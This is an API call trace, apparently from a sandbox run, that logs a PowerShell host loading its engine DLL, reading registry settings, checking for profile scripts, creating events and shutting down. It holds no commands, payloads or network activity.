[0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.087] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.088] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.089] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.089] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.089] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.089] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.089] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.089] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.089] VirtualQuery (in: lpAddress=0x24cb40, lpBuffer=0x24db40, dwLength=0x1c | out: lpBuffer=0x24db40*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.197] GetLastError () returned 0xcb [0149.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.197] GetLastError () returned 0xcb [0149.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.197] GetLastError () returned 0xcb [0149.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.197] GetLastError () returned 0xcb [0149.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.213] GetLastError () returned 0xcb [0149.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.213] GetLastError () returned 0xcb [0149.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.213] GetLastError () returned 0xcb [0149.213] VirtualQuery (in: lpAddress=0x24ce68, lpBuffer=0x24de68, dwLength=0x1c | out: lpBuffer=0x24de68*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.214] GetLastError () returned 0xcb [0149.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.214] GetLastError () returned 0xcb [0149.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0149.214] GetLastError () returned 0xcb [0149.214] VirtualQuery (in: lpAddress=0x24ce60, lpBuffer=0x24de60, dwLength=0x1c | out: lpBuffer=0x24de60*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.214] VirtualQuery (in: lpAddress=0x24cb14, lpBuffer=0x24db14, dwLength=0x1c | out: lpBuffer=0x24db14*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.214] VirtualQuery (in: lpAddress=0x24cb14, lpBuffer=0x24db14, dwLength=0x1c | out: lpBuffer=0x24db14*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e59c | out: phkResult=0x24e59c*=0x3b4) returned 0x0 [0149.217] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e5e4, lpData=0x0, lpcbData=0x24e5e0*=0x0 | out: lpType=0x24e5e4*=0x1, lpData=0x0, lpcbData=0x24e5e0*=0x56) returned 0x0 [0149.217] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e5e4, lpData=0x338390, lpcbData=0x24e5e0*=0x56 | out: lpType=0x24e5e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e5e0*=0x56) returned 0x0 [0149.217] RegCloseKey (hKey=0x3b4) returned 0x0 [0149.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e59c | out: phkResult=0x24e59c*=0x3b4) returned 0x0 [0149.217] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e5e4, lpData=0x0, lpcbData=0x24e5e0*=0x0 | out: lpType=0x24e5e4*=0x1, lpData=0x0, lpcbData=0x24e5e0*=0x56) returned 0x0 [0149.217] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e5e4, lpData=0x338390, lpcbData=0x24e5e0*=0x56 | out: lpType=0x24e5e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e5e0*=0x56) returned 0x0 [0149.218] RegCloseKey (hKey=0x3b4) returned 0x0 [0149.224] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x338390 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0149.225] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0149.225] GetLastError () returned 0x3f0 [0149.226] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x338390 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0149.226] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x24e134, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0149.226] GetLastError () returned 0x3f0 [0149.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0149.227] GetLastError () returned 0x3f0 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24e64c | out: lpFileInformation=0x24e64c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.227] GetLastError () returned 0x2 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0149.227] GetLastError () returned 0x2 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24e64c | out: lpFileInformation=0x24e64c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.227] GetLastError () returned 0x2 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.227] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0149.227] GetLastError () returned 0x2 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.227] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24e64c | out: lpFileInformation=0x24e64c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.227] GetLastError () returned 0x3 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.227] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0149.227] GetLastError () returned 0x3 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.227] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24e64c | out: lpFileInformation=0x24e64c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.227] GetLastError () returned 0x3 [0149.227] SetErrorMode (uMode=0x1) returned 0x1 [0149.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.228] GetLastError () returned 0xcb [0149.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.229] GetLastError () returned 0xcb [0149.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.231] GetLastError () returned 0xcb [0149.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.232] GetLastError () returned 0xcb [0149.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.233] GetLastError () returned 0xcb [0149.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.238] GetLastError () returned 0xcb [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0 [0149.239] GetLastError () returned 0x0 [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x380 [0149.239] GetLastError () returned 0x0 [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0149.239] GetLastError () returned 0x0 [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1e4 [0149.239] GetLastError () returned 0x0 [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1ec [0149.239] GetLastError () returned 0x0 [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x324 [0149.239] GetLastError () returned 0x0 [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328 [0149.239] GetLastError () returned 0x0 [0149.239] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344 [0149.240] GetLastError () returned 0x0 [0149.240] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350 [0149.240] GetLastError () returned 0x0 [0149.240] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x354 [0149.240] GetLastError () returned 0x0 [0149.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358 [0149.240] GetLastError () returned 0x0 [0149.240] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x35c [0149.240] GetLastError () returned 0x0 [0149.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.261] GetLastError () returned 0xcb [0149.268] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0149.268] GetLastError () returned 0xcb [0149.268] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24e68c | out: lpMode=0x24e68c) returned 1 [0149.269] GetLastError () returned 0xcb [0149.270] SetEvent (hEvent=0x1e4) returned 1 [0149.270] GetLastError () returned 0xcb [0149.270] SetEvent (hEvent=0x3a0) returned 1 [0149.270] GetLastError () returned 0xcb [0149.270] SetEvent (hEvent=0x380) returned 1 [0149.270] GetLastError () returned 0xcb [0149.270] SetEvent (hEvent=0x3a4) returned 1 [0149.270] GetLastError () returned 0xcb [0149.270] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a8 [0149.270] GetLastError () returned 0x0 [0149.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.271] GetLastError () returned 0xcb [0149.272] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e4f0 | out: phkResult=0x24e4f0*=0x3ac) returned 0x0 [0149.272] RegQueryValueExW (in: hKey=0x3ac, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24e538, lpData=0x0, lpcbData=0x24e534*=0x0 | out: lpType=0x24e538*=0x0, lpData=0x0, lpcbData=0x24e534*=0x0) returned 0x2 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384 [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388 [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3bc [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c0 [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c4 [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8 [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0153.298] GetLastError () returned 0x0 [0153.298] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0153.298] GetLastError () returned 0x0 [0153.299] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d4 [0153.299] GetLastError () returned 0x0 [0153.299] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d8 [0153.299] GetLastError () returned 0x0 [0153.299] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0153.299] GetLastError () returned 0x0 [0153.299] SetEvent (hEvent=0x3bc) returned 1 [0153.299] GetLastError () returned 0x0 [0153.299] SetEvent (hEvent=0x384) returned 1 [0153.299] GetLastError () returned 0x0 [0153.299] SetEvent (hEvent=0x388) returned 1 [0153.299] GetLastError () returned 0x0 [0153.299] SetEvent (hEvent=0x39c) returned 1 [0153.299] GetLastError () returned 0x0 [0153.299] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0153.299] GetLastError () returned 0x0 [0153.299] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e524 | out: phkResult=0x24e524*=0x3e4) returned 0x0 [0153.300] RegQueryValueExW (in: hKey=0x3e4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24e56c, lpData=0x0, lpcbData=0x24e568*=0x0 | out: lpType=0x24e56c*=0x0, lpData=0x0, lpcbData=0x24e568*=0x0) returned 0x2 [0153.390] SetEvent (hEvent=0x3c0) returned 1 [0153.390] GetLastError () returned 0x0 [0153.390] SetEvent (hEvent=0x3c4) returned 1 [0153.390] GetLastError () returned 0x0 [0153.390] SetEvent (hEvent=0x3c8) returned 1 [0153.390] GetLastError () returned 0x0 [0153.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0153.454] GetLastError () returned 0xcb [0153.463] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e600 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e600) returned 0x1 [0153.463] GetLastError () returned 0xcb [0153.463] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e608 | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e608) returned 1 [0153.466] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e0d7cc*="Stopped", lpRawData=0x2e0d688) returned 1 [0153.481] GetLastError () returned 0x0 [0153.481] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0153.481] GetLastError () returned 0x0 [0153.495] CoGetContextToken (in: pToken=0x24f338 | out: pToken=0x24f338) returned 0x0 [0153.495] CObjectContext::QueryInterface () returned 0x0 [0153.495] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.495] Release () returned 0x0 [0153.496] CoGetContextToken (in: pToken=0x24f110 | out: pToken=0x24f110) returned 0x0 [0153.496] CObjectContext::QueryInterface () returned 0x0 [0153.497] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.497] Release () returned 0x0 [0153.499] CoGetContextToken (in: pToken=0x24f110 | out: pToken=0x24f110) returned 0x0 [0153.499] CObjectContext::QueryInterface () returned 0x0 [0153.499] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.499] Release () returned 0x0 [0153.504] CoGetContextToken (in: pToken=0x24f110 | out: pToken=0x24f110) returned 0x0 [0153.504] CObjectContext::QueryInterface () returned 0x0 [0153.504] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.504] Release () returned 0x0 [0153.587] CoGetContextToken (in: pToken=0x24f0f0 | out: pToken=0x24f0f0) returned 0x0 [0153.587] CObjectContext::QueryInterface () returned 0x0 [0153.587] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.587] Release () returned 0x0 [0153.588] CoUninitialize () Thread: id = 116 os_tid = 0x580 Thread: id = 117 os_tid = 0x938 Thread: id = 122 os_tid = 0x8d4 Thread: id = 126 os_tid = 0xc8 Thread: id = 129 os_tid = 